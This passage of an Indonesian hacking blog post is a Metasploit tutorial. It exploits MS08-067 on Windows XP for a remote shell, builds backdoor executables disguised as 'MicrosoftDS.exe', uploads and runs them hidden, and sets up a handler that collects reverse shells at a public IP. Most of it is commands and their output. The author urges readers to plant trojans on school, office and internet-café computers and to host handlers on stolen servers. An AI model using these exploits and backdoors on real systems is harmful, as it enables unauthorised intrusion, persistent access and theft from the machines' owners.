0  Automatic Targeting
1  Windows 2000 Universal
2  Windows XP SP0/SP1  Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
-------- cut -----------

Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :

1 2	`msf exploit(ms08_067_netapi)` `>` `set` `payload windows/shell_bind_tcp` `payloads` `=>` `windows/shell_bind_tcp`

Untuk melihat payload apa saja dalam metasploit, gunakan perintah :

msf exploit(ms08_067_netapi) >  show payloads
Compatible payloads
===================
Name  Description
---- -----------
generic/debug_trap  Generic x86 Debug Trap
generic/debug_trap/bind_ipv6_tcp  Generic x86 Debug Trap, Bind TCP Stager (IPv6)
generic/debug_trap/bind_nonx_tcp  Generic x86 Debug Trap, Bind TCP Stager (No  NX Support)
generic/debug_trap/bind_tcp  Generic x86 Debug Trap, Bind TCP Stager
-----------  dipotong sampai disini ---------------

Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :

msf exploit(ms08_067_netapi) >  show options
Module options:
Name Current Setting Required Description
----  --------------- -------- -----------
RHOST 192.168.1.28  yes The target address
RPORT 445 yes  Set the SMB service port
SMBPIPE  BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
Name  Current Setting Required Description
----  --------------- -------- -----------
EXITFUNC thread yes Exit  technique: seh,  thread, process
LPORT  4444 yes The  local port
RHOST 192.168.1.28  no The target address
Exploit target:
Id  Name
-- ----
0 Automatic Targeting
 
sekarang jalankan exploit :
msf exploit(ms08_067_netapi) >  exploit
[*]  Started bind handler
[*] Automatically detecting the target...
[*]  Fingerprint: Windows XP Service Pack 2 -  lang:English
[*]  Selected Target: Windows XP SP2 English (NX)
[*]  Triggering the vulnerability...
[*]  Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.28:4444)
Microsoft Windows XP  [Version 5.1.2600]
© Copyright 1985-2001  Microsoft Corp.

Selamat…kita sudah Menguasai Satu Komputer….nahhhhhhh sekarang terserah anda….kan masih ada 3 alat lagi yang blom kita gunakan..
nah untuk itu..anda harus mencari sendiri cara untuk mengistal trojan di komputerNya dan mendapatkan sesuatu yang anda inginkan…..
kan sa sudah kasihkan sampai penguasaan komputer….sekarang terserah anda.. ^_^ mat belajar yahh…..
Nah Saya Akan tambahkan lagi cara Menyusupkan Program Kekomputer target.
Menyusupkan file pada kompi orang……
pake metasploit”
sedikit tutorial .
Mungkin sebagian sudah ada yang tahu bahwa metasploit dapat digunakan untuk membuat backdoor, pernah juga disinggung pada toket edisi new year 2009. Penggunaan backdoor ini sangat berguna terutama sebagai post-exploitation method. Pada contoh kali ini kita akan memanfaatkan 2 metode dasar mendapatkan shell dari target, yaitu bind_tcp dan reverse_tcp.
Untuk bind_tcp, backdoor akan dijalankan pada terget dimana target akan membuka port pada sistemnya sendiri. Sehingga setelah proses exploitasi selesai, kita dapat masuk kapan saja ke target dengan memanfaatkan port yang telah dibuka oleh backdoor tersebut.

$ ./msfpayload  windows/meterpreter/bind_tcp LPORT=4321  RHOST=10.10.96.143 EXITFUNC=thread  X > MicrosoftDS.exe
Created by msfpayload  (http://www[dot]metasploit[dot]com).
Payload: windows/meterpreter/bind_tcp
Length: 307
Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread

Backdoor tersebut akan membuka port 4321 pada target 10.10.96.143. Bagaimana proses menjalankan backdoor tersebut terserah kita, bisa jadi backdoor ditanam dan dijalankan setelah proses exploitasi selesai terhadap target seperti berikut:

msf  exploit(ms08_067_netapi) > exploit
 
[*] Handler binding to LHOST  0.0.0.0
[*]  Started reverse handler
[*]  Automatically detecting the  target...
[*] Fingerprint: Windows XP Service Pack  0 / 1  - lang:English
[*]  Selected Target: Windows XP SP0/SP1  Universal
[*]  Triggering the vulnerability...
[*]  Transmitting intermediate stager for  over-sized stage...(191  bytes)
[*] Sending stage (2650  bytes)
[*] Sleeping before handling stage...
[*]  Uploading DLL (75787 bytes)...
[*]  Upload completed.
[*] Meterpreter session 3 opened  (10.10.97.14:31338  -> 10.10.96.143:4780)
 
meterpreter > cd  \
meterpreter > pwd
C:\
meterpreter  > upload MicrosoftDS.exe
[*]  uploading : MicrosoftDS.exe ->  MicrosoftDS.exe
[*]  uploaded : MicrosoftDS.exe ->  MicrosoftDS.exe
meterpreter  > execute -f MicrosoftDS.exe -H
Process  2348 created.

Pada saat berikutnya, kita dapat masuk ke mesin target tanpa melakukan exploitasi ulang, cukup dengan membuka koneksi pada port yang telah didefinisikan berikutnya.

msf >  use exploit/multi/handler
msf  exploit(handler)  > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD  => windows/meterpreter/bind_tcp
msf  exploit(handler)  > set LPORT 4321
LPORT =>  4321
msf exploit(handler) >  set RHOST 10.10.96.143
RHOST =>  10.10.96.143
msf exploit(handler) >  exploit
 
[*] Starting the payload handler...
[*]  Started bind handler
[*] Transmitting intermediate stager for over-sized  stage...(191 bytes)
[*]  Sending stage (2650 bytes)
[*]  Sleeping before handling stage...
[*]  Uploading DLL (75787 bytes)...
[*]  Upload completed.
[*] Meterpreter session 2 opened  (10.10.97.14:58798  -> 10.10.96.143:4321)
 
meterpreter >

Metode kedua menggunakan reverse shell, reverse shell digunakan terutama apabila network target dibatasi oleh firewall sehingga tidak bisa membuka koneksi ke semua port (tipikal internal network). Jadi jika kalian mendapatkan kesempatan untuk hacking ke salah satu mesin dalam internal network (misal: komputer sekolah, komputer kantor, komputer warnet, etc) serta tetap ingin mendapatkan akses shell tersebut kapanpun dan dimanapun bisa memanfaatkan multi-handler metasploit untuk menerima reverse shell. Kita bisa setup multi-handler di mesin-mesin yang dapat diakses dari manapun di internet, misalnya: mesin hosting, atau mesin server hasil rampokan, dsb.

msf >  use exploit/multi/handler
msf  exploit(handler)  > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD  => windows/meterpreter/reverse_tcp
msf  exploit(handler)  > show options
 
Module options:
 
Name Current Setting Required Description
----  --------------- -------- -----------
 
Payload options (windows/meterpreter/reverse_tcp):
 
Name Current Setting  Required Description
---- --------------- -------- -----------
EXITFUNC  seh yes Exit technique: seh, thread, process
LHOST  yes The local  address
LPORT 4444 yes  The local port
 
Exploit target:
 
Id Name
--  ----
0 Wildcard  Target
 
msf  exploit(handler)  > set LPORT 53
LPORT =>  53
msf exploit(handler) >  set LHOST 222.124.199.76
LHOST =>  222.124.199.76
msf exploit(handler) >  set ExitOnSession false
msf  exploit(handler)  > exploit
 
[*]  Handler binding to LHOST 0.0.0.0
[*]  Started reverse handler
[*]  Starting the payload handler...

Selanjutnya tinggal buat backdoor dengan kategori reverse_shell:

$ ./msfpayload windows/meterpreter/reverse_tcp  LPORT=53 LHOST=222.124.199.76 EXITFUNC=thread  X > MicrosoftDS.exe
Created by msfpayload  (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LPORT=53,LHOST=222.124.199.76,EXITFUNC=thread
$ file MicrosoftDS.exe
MicrosoftDS.exe: MS-DOS  executable PE for MS Windows (GUI) Intel  80386 32-bit

Dan ketika dijalankan (dijalankan melalui sesi pasca exploitasi ataupun dijalankan secara manual lewat double-click mouse

), pada multi-handler akan muncul:

[*]  Handler binding to LHOST 0.0.0.0
[*]  Started reverse handler
[*]  Starting the payload handler...
[*]  Transmitting intermediate stager for  over-sized stage...(191  bytes)
[*] Sending stage (2650  bytes)
[*] Sleeping before handling stage...
[*]  Uploading DLL (75787 bytes)...
[*]  Upload completed.
[*] Meterpreter session 3 opened  (222.124.199.76:53  -> 10.10.96.143:4831)
 
meterpreter >

Asyiknya menggunakan multi-handler metasploit adalah kita dapat memiliki banyak sessions sekaligus, untuk contoh diatas dapat dilihat satu multi-handler yang telah diset ExitOnSession==false dapat menghandle banyak reverse_shell sekaligus. Dan kita dapat berinteraksi dengan session-session tersebut kapanpun kita mau:

msf  exploit(handler)  > sessions -l
 
Active sessions
===============
 
Id Description Tunnel
--  ----------- ------
3 Meterpreter  222.124.199.76:53 -> 10.10.96.146:4831
4 Meterpreter 222.124.199.76:53  -> 10.10.96.223:4836
5 Meterpreter 222.124.199.76:53  -> 10.10.96.215:4838
6 Meterpreter 222.124.199.76:53  -> 172.16.96.143:4840
7 Meterpreter 222.124.199.76:53  -> 172.16.96.143:4845
8 Meterpreter 222.124.199.76:53  -> 172.16.96.143:4846
9 Meterpreter 222.124.199.76:53  -> 172.16.96.143:4847
 
msf exploit(handler) >  sessions -i 3
[*]  Starting interaction with  3...
meterpreter > sysinfo
Computer: PROGWAR
OS : Windows  XP (Build 2600, ).

Itulah beberapa contoh pemanfaatan metasploit untuk backdooring, masih banyak contoh-contoh kreatif lainnya terutama yang berbau kiddies dan evil-in-mind. Oh iya, pada contoh diatas saya menggunakan payload meterpreter berkali-kali. Pembahasan tentang meterpreter akan dilakukan berikutnya.
bisa juga di gunakan untuk eksekusi dan upload file,,
kreasiin ya
Nah Untuk Tools Pendukungnya Silahkan sedot Disini , saya lengkapi juga dengan Video Tutorialnya :

Metasploit Framework Console
Backdoring Tools
Untuk Scan IP Range dan Port 445

.

Social Icons

Menu

Info contact

Labels

Blog Archive

Sunday 17 April 2011

Exploit

EXPLOIT DATABASE

PACKETSTORM DATABASE

OPENSOURCE VULNERABILITY DATABASE

SECURITYFOCUS DATABASE

Cara Ngeroot Target

Shell List Archive

Tutorial Upload Shell Target LFI Dengan Temper Data

Tutorial Upload Shell Target LFI Dengan Tamper Data

Metasploit Complete Tutorial With Supporting tools

HOME

About Me

Popular Posts

Followers